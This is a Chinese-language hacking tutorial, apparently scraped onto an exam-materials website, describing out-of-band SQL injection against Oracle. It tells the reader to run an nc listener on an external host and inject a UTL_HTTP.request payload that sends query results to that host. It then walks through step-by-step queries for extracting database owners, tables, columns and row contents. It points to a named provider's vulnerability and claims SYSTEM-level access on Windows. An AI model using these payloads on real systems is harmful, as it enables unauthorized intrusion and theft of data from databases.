标题 | Oracle注射技术——Oracle+nc注射 |
内容 | 首先外网nc监听对应的端口 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1-- 爆库: select owner from all_tables where rownum=1 select owner from all_tables where owner<>'第一个库名' and rownum=1 select owner from all_tables where owner<>'第一个库名' and owner<>'第二个'and rownum=1 select owner from all_tables where owner<>'第一个库名' and owner<>'第一个库名' and rownum=1 以此论推 爆表: select TABLE_NAME from all_tables where owner='库名' and rownum=1 select TABLE_NAME from all_tables where owner='库名' and rownum=1 and TABLE_NAME<>'表名1' select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2' 以此论推 爆列: select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' and COLUMN_NAME<>'第二个爆出的列名' 爆内容: 第一个内容:select 列名 from 表名 where rownum=1 第二个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' 第三个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' and 列名<>'第二个值' 以此论推 现在大家转过头来看下“万网的尴尬-万网ORACLE注入漏洞曝光http://bbs.exploits.com.cn/read.php?tid-144.html 是不是很明了了...o(∩_∩)o...哈哈 注: 1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料 2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁 |
随便看 |
|
在线学习网考试资料包含高考、自考、专升本考试、人事考试、公务员考试、大学生村官考试、特岗教师招聘考试、事业单位招聘考试、企业人才招聘、银行招聘、教师招聘、农村信用社招聘、各类资格证书考试等各类考试资料。